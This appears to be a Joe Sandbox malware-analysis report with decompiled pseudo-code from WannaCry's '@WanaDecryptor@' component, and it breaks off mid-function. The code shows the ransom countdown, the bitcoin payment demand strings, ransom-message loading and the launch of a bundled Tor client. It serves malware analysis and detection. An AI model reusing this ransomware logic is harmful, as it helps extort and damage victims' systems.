                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                  • String ID:
                                  • API String ID: 3405503685-0
                                  • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                  • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E004076A0(void* __ecx) {
                                  				intOrPtr _t89;
                                  				char _t90;
                                  				intOrPtr _t91;
                                  				signed int _t94;
                                  				intOrPtr _t98;
                                  				signed int _t99;
                                  				intOrPtr _t125;
                                  				signed int _t133;
                                  				void* _t136;
                                  				intOrPtr _t139;
                                  				signed int _t143;
                                  				signed int _t147;
                                  				void* _t148;
                                  				intOrPtr _t161;
                                  				signed int _t192;
                                  				intOrPtr _t193;
                                  				signed int _t196;
                                  				signed int _t197;
                                  				signed int _t198;
                                  				intOrPtr _t200;
                                  				intOrPtr _t202;
                                  				void* _t204;
                                  				intOrPtr _t206;
                                  				void* _t207;
                                  				void* _t208;
                                  				void* _t209;
                                  				void* _t210;
                                  				void* _t211;
                                  				void* _t213;
                                  				long long _t225;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413EBB);
                                  				_t89 =  *[fs:0x0];
                                  				_push(_t89);
                                  				 *[fs:0x0] = _t206;
                                  				_t207 = _t206 - 0x8c;
                                  				_t196 = 0;
                                  				_t136 = __ecx;
                                  				 *((intOrPtr*)(_t207 + 0x14)) = 0;
                                  				 *((intOrPtr*)(_t207 + 0x18)) = 0;
                                  				 *(_t207 + 0x1c) = 0;
                                  				 *(_t207 + 0x20) = 0;
                                  				_t204 = 0;
                                  				L2:
                                  				__imp__time(_t196);
                                  				_t139 = M00421120; // 0x30303b30
                                  				_t161 = _t89;
                                  				_t90 = "00;00;00;00"; // 0x303b3030
                                  				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
                                  				 *(_t207 + 0x3c) = _t90;
                                  				_t91 =  *0x421124; // 0x30303b
                                  				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
                                  				_t208 = _t207 + 4;
                                  				 *(_t208 + 0x24) = _t196;
                                  				memset(_t208 + 0x44, 0, 0x16 << 2);
                                  				_t209 = _t208 + 0xc;
                                  				if(_t204 != 0) {
                                  					_t94 =  *(_t136 + 0x580);
                                  				} else {
                                  					_t94 =  *(_t136 + 0x57c);
                                  				}
                                  				_t98 =  *((intOrPtr*)(_t136 + 0x578));
                                  				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
                                  				if(_t161 <= _t98) {
                                  					_t99 =  *(_t209 + 0x24);
                                  				} else {
                                  					_t133 = _t98 - _t161 + _t143;
                                  					_t196 = _t133;
                                  					if(_t196 <= 0) {
                                  						_t99 =  *(_t209 + 0x24);
                                  					} else {
                                  						asm("cdq");
                                  						_t99 = _t133 * 0x64 / _t143;
                                  					}
                                  					if(_t196 < 0) {
                                  						_t196 = 0;
                                  					}
                                  				}
                                  				if(_t204 != 0) {
                                  					 *(_t209 + 0x20) = _t99;
                                  				} else {
                                  					 *(_t209 + 0x14) = _t196;
                                  					 *(_t209 + 0x1c) = _t99;
                                  				}
                                  				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
                                  				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
                                  				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
                                  				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
                                  				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
                                  				_t198 = _t197 + _t192 * 0xfffff1f0;
                                  				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
                                  				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
                                  				_t207 = _t209 + 0x18;
                                  				if(_t204 != 0) {
                                  					_t148 = _t136 + 0x444;
                                  					_push(_t207 + 0x38);
                                  				} else {
                                  					_push(_t207 + 0x38);
                                  					_t148 = _t136 + 0x3c8;
                                  				}
                                  				_t89 = E00405180(_t148);
                                  				_t204 = _t204 + 1;
                                  				if(_t204 < 2) {
                                  					_t196 = 0;
                                  					goto L2;
                                  				}
                                  				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
                                  				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
                                  				L00412DA6();
                                  				 *(_t207 + 0xa4) = 0;
                                  				_t225 =  *((intOrPtr*)(_t136 + 0x584));
                                  				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
                                  					_t225 = _t225 + st0;
                                  					 *(_t136 + 0x818) = 1;
                                  				}
                                  				_t124 =  *((intOrPtr*)(_t136 + 0x588));
                                  				if(_t124 != 0) {
                                  					 *((long long*)(_t207 + 0x14)) = _t225;
                                  					_t200 =  *((intOrPtr*)(_t207 + 0x18));
                                  					_t193 =  *((intOrPtr*)(_t207 + 0x14));
                                  					_push(_t200);
                                  					_push(_t193);
                                  					_t124 = _t136 + 0x81c;
                                  					_push("%.1f BTC");
                                  					_push(_t136 + 0x81c);
                                  					L00412E00();
                                  					_t210 = _t207 + 0x10;
                                  					_push(_t200);
                                  					_push(_t193);
                                  					_push("Send %.1f BTC to this address:");
                                  					_push(_t210 + 0x10);
                                  					L00412E00();
                                  					_t211 = _t210 + 0x10;
                                  				} else {
                                  					L0041304A();
                                  					_t202 = _t124;
                                  					_push(_t202);
                                  					_push("$%d");
                                  					_push(_t136 + 0x81c);
                                  					L00412E00();
                                  					_t213 = _t207 + 0xc;
                                  					_push(_t202);
                                  					_push("Send $%d worth of bitcoin to this address:");
                                  					_push(_t213 + 0x10);
                                  					L00412E00();
                                  					_t211 = _t213 + 0xc;
                                  				}
                                  				_push( *((intOrPtr*)(_t211 + 0x10)));
                                  				_push(0x402);
                                  				L00412CE6();
                                  				L00412CE0();
                                  				_t125 =  *((intOrPtr*)(_t136 + 0x824));
                                  				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
                                  				if(_t125 != 0x121284) {
                                  					E004079C0(_t136);
                                  					_t125 =  *((intOrPtr*)(_t211 + 0xac));
                                  					if(_t125 != 0) {
                                  						InvalidateRect( *(_t136 + 0x20), 0, 1);
                                  						_push( *((intOrPtr*)(_t136 + 0x824)));
                                  						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                  						_push( *((intOrPtr*)(_t136 + 0x824)));
                                  						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                  					}
                                  				}
                                  				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
                                  				return _t125;
                                  			}


                                  APIs
                                  • time.MSVCRT ref: 004076DA
                                  • sprintf.MSVCRT ref: 0040780E
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                  • #540.MFC42 ref: 00407876
                                  • _ftol.MSVCRT ref: 004078AA
                                  • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                  • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                  • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                  • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                  • #3092.MFC42(00000402,?), ref: 0040791D
                                  • #6199.MFC42(00000402,?), ref: 00407924
                                  • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                  • #800.MFC42 ref: 0040799F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                  • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                  • API String ID: 993288296-3256873439
                                  • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                  • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00405E10(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				void* _t86;
                                  				intOrPtr* _t121;
                                  				intOrPtr* _t122;
                                  				intOrPtr* _t123;
                                  				intOrPtr* _t124;
                                  				intOrPtr* _t125;
                                  				intOrPtr* _t126;
                                  				intOrPtr* _t127;
                                  				intOrPtr _t132;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413C65);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t132;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t121 = __ecx + 0x890;
                                  				_v16 = _t121;
                                  				 *_t121 = 0x415c00;
                                  				_v4 = 0x1d;
                                  				L00412D52();
                                  				 *_t121 = 0x415bec;
                                  				_t122 = __ecx + 0x888;
                                  				_v16 = _t122;
                                  				 *_t122 = 0x415c00;
                                  				_v4 = 0x1e;
                                  				L00412D52();
                                  				 *_t122 = 0x415bec;
                                  				_t123 = __ecx + 0x880;
                                  				_v16 = _t123;
                                  				 *_t123 = 0x415c00;
                                  				_v4 = 0x1f;
                                  				L00412D52();
                                  				 *_t123 = 0x415bec;
                                  				_t124 = __ecx + 0x878;
                                  				_v16 = _t124;
                                  				 *_t124 = 0x415c00;
                                  				_v4 = 0x20;
                                  				L00412D52();
                                  				 *_t124 = 0x415bec;
                                  				_v4 = 0x18;
                                  				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                  				E00403F20(__ecx + 0x870);
                                  				_v4 = 0x17;
                                  				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                  				E00403F20(__ecx + 0x868);
                                  				_v4 = 0x16;
                                  				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                  				E00403F20(__ecx + 0x860);
                                  				_v4 = 0x15;
                                  				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                  				E00403F20(__ecx + 0x858);
                                  				_t125 = __ecx + 0x850;
                                  				_v16 = _t125;
                                  				 *_t125 = 0x415c00;
                                  				_v4 = 0x21;
                                  				L00412D52();
                                  				 *_t125 = 0x415bec;
                                  				_v4 = 0x13;
                                  				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                  				E00403F20(__ecx + 0x848);
                                  				_v4 = 0x12;
                                  				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                  				E00403F20(__ecx + 0x840);
                                  				_v4 = 0x11;
                                  				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                  				E00403F20(__ecx + 0x838);
                                  				_t126 = __ecx + 0x830;
                                  				_v16 = _t126;
                                  				 *_t126 = 0x415c00;
                                  				_v4 = 0x22;
                                  				L00412D52();
                                  				 *_t126 = 0x415bec;
                                  				_v4 = 0xf;
                                  				L00412CC2();
                                  				_v4 = 0xe;
                                  				L00412CC2();
                                  				_v4 = 0xd;
                                  				L00412CC2();
                                  				_v4 = 0xc;
                                  				L00412CC2();
                                  				_v4 = 0xb;
                                  				L00412EF6();
                                  				_v4 = 0xa;
                                  				E004050A0(__ecx + 0x444);
                                  				_v4 = 9;
                                  				E004050A0(__ecx + 0x3c8);
                                  				_v4 = 8;
                                  				E00404170(__ecx + 0x360);
                                  				_v4 = 7;
                                  				E00404170(__ecx + 0x2f8);
                                  				_v4 = 6;
                                  				E00404170(__ecx + 0x290);
                                  				_v4 = 5;
                                  				E00404170(__ecx + 0x228);
                                  				_t127 = __ecx + 0x1a4;
                                  				_v16 = _t127;
                                  				 *_t127 = 0x4161a4;
                                  				_v4 = 0x23;
                                  				L00412F0E();
                                  				_v4 = 4;
                                  				L00412C9E();
                                  				_v4 = 3;
                                  				_t86 = E00405D90(__ecx + 0x120);
                                  				_v4 = 2;
                                  				L00412EF0();
                                  				_v4 = 1;
                                  				L00412EF0();
                                  				_v4 = 0;
                                  				L00412D4C();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t86;
                                  			}


                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                  • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                  • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                  • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                  • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                  • String ID: #
                                  • API String ID: 2377847243-1885708031
                                  • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                  • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E004032C0(intOrPtr __ecx) {
                                  				intOrPtr _t16;
                                  				long _t17;
                                  				struct HFONT__* _t19;
                                  				long _t20;
                                  				long _t21;
                                  				long _t23;
                                  				int _t35;
                                  				int _t38;
                                  				int _t40;
                                  				int _t47;
                                  				intOrPtr _t48;
                                  
                                  				_t48 = __ecx;
                                  				L00412CB0();
                                  				_t16 =  *0x42189c; // 0x0
                                  				_t17 =  *(_t16 + 0x824);
                                  				 *(__ecx + 0xe8) = _t17;
                                  				_push(CreateSolidBrush(_t17));
                                  				L00412D5E();
                                  				_t47 = __ecx + 0xec;
                                  				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t19);
                                  				L00412D5E();
                                  				_push(0x408);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t35 =  *(_t47 + 4);
                                  				} else {
                                  					_t35 = 0;
                                  				}
                                  				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
                                  				_push(0x409);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t38 =  *(_t47 + 4);
                                  				} else {
                                  					_t38 = 0;
                                  				}
                                  				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
                                  				_push(2);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t40 =  *(_t47 + 4);
                                  				} else {
                                  					_t40 = 0;
                                  				}
                                  				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
                                  				_push(0x40e);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t47 =  *(_t47 + 4);
                                  				}
                                  				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
                                  				E00403CB0(_t48);
                                  				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
                                  				_push(0xffffffff);
                                  				_push(0xffffffff);
                                  				_push(0);
                                  				_push("Path");
                                  				_push(0);
                                  				L00412D58();
                                  				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
                                  				 *0x4217bc = _t48;
                                  				return 1;
                                  			}


                                  APIs
                                  • #4710.MFC42 ref: 004032C5
                                  • CreateSolidBrush.GDI32(?), ref: 004032DC
                                  • #1641.MFC42(00000000), ref: 004032E9
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                  • #1641.MFC42(00000000), ref: 0040331F
                                  • #3092.MFC42(00000408,00000000), ref: 0040332B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                  • #3092.MFC42(00000409), ref: 00403353
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                  • #3092.MFC42(00000002), ref: 00403372
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                  • #3092.MFC42(0000040E), ref: 00403394
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                  • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                  • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                  • String ID: Arial$Path
                                  • API String ID: 2448086372-1872211634
                                  • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                  • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00406AE0(void* __ecx) {
                                  				char _v4;
                                  				char _v12;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				void* _v280;
                                  				char _v284;
                                  				char _v288;
                                  				char _v292;
                                  				void* _v296;
                                  				char _v300;
                                  				intOrPtr _v304;
                                  				char _v308;
                                  				void* _v312;
                                  				void* _v316;
                                  				char** _t26;
                                  				long _t30;
                                  				void* _t31;
                                  				char** _t32;
                                  				void* _t56;
                                  				intOrPtr _t58;
                                  				void* _t60;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E61);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_t56 = __ecx;
                                  				L00412DA6();
                                  				_t26 =  &_v284;
                                  				_push(_t26);
                                  				_v4 = 0;
                                  				L00412DD6();
                                  				_push("msg\\");
                                  				L00412CAA();
                                  				_push("m_%s.wnry");
                                  				_push(_t26);
                                  				_push( &_v288);
                                  				_v12 = 1;
                                  				L00412CCE();
                                  				sprintf( &_v292,  *_t26, _v304);
                                  				_t60 = _t58 - 0x110 + 0xc;
                                  				L00412CC2();
                                  				_v24 = 0;
                                  				L00412CC2();
                                  				_t30 = GetFileAttributesA( &_v292);
                                  				if(_t30 == 0xffffffff) {
                                  					_push("msg\\");
                                  					L00412CAA();
                                  					_push("m_%s.wnry");
                                  					_push(_t30);
                                  					_t32 =  &_v300;
                                  					_v28 = 2;
                                  					_push(_t32);
                                  					L00412CCE();
                                  					sprintf( &_v308,  *_t32, "English");
                                  					_t60 = _t60 + 0xc;
                                  					L00412CC2();
                                  					_v40 = 0;
                                  					L00412CC2();
                                  				}
                                  				_t31 = E00406CF0(_t56,  &_v292);
                                  				_v28 = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] = _v36;
                                  				return _t31;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                  • String ID: English$m_%s.wnry$msg\
                                  • API String ID: 3713669620-4206458537
                                  • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                  • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0040B840() {
                                  				void _v519;
                                  				char _v520;
                                  				void _v1039;
                                  				char _v1040;
                                  				struct _STARTUPINFOA _v1108;
                                  				struct _PROCESS_INFORMATION _v1124;
                                  				char _t29;
                                  				void* _t46;
                                  				char _t47;
                                  				void* _t55;
                                  				void* _t56;
                                  				void* _t84;
                                  				void* _t86;
                                  
                                  				_t29 =  *0x421798; // 0x0
                                  				_v1040 = _t29;
                                  				memset( &_v1039, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
                                  				_t84 =  &_v1124 + 0x20;
                                  				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
                                  					L8:
                                  					_v1108.cb = 0x44;
                                  					_v1124.hProcess = 0;
                                  					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
                                  					_v1124.hThread = 0;
                                  					_v1124.dwProcessId = 0;
                                  					_v1124.dwThreadId = 0;
                                  					_v1108.wShowWindow = 0;
                                  					_v1108.dwFlags = 1;
                                  					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
                                  						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
                                  							WaitForSingleObject(_v1124.hProcess, 0x7530);
                                  						}
                                  						CloseHandle(_v1124);
                                  						CloseHandle(_v1124.hThread);
                                  						return 1;
                                  					} else {
                                  						return 0;
                                  					}
                                  				} else {
                                  					_t46 = E0040B6A0("TaskData", 0x4220e4, 0);
                                  					_t86 = _t84 + 0xc;
                                  					if(_t46 != 0) {
                                  						L5:
                                  						_t47 =  *0x421798; // 0x0
                                  						_v520 = _t47;
                                  						memset( &_v519, 0, 0x81 << 2);
                                  						asm("stosw");
                                  						asm("stosb");
                                  						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
                                  						_t84 = _t86 + 0x20;
                                  						if(GetFileAttributesA( &_v520) != 0xffffffff) {
                                  							CopyFileA( &_v520,  &_v1040, 0);
                                  							goto L8;
                                  						} else {
                                  							return 0;
                                  						}
                                  					} else {
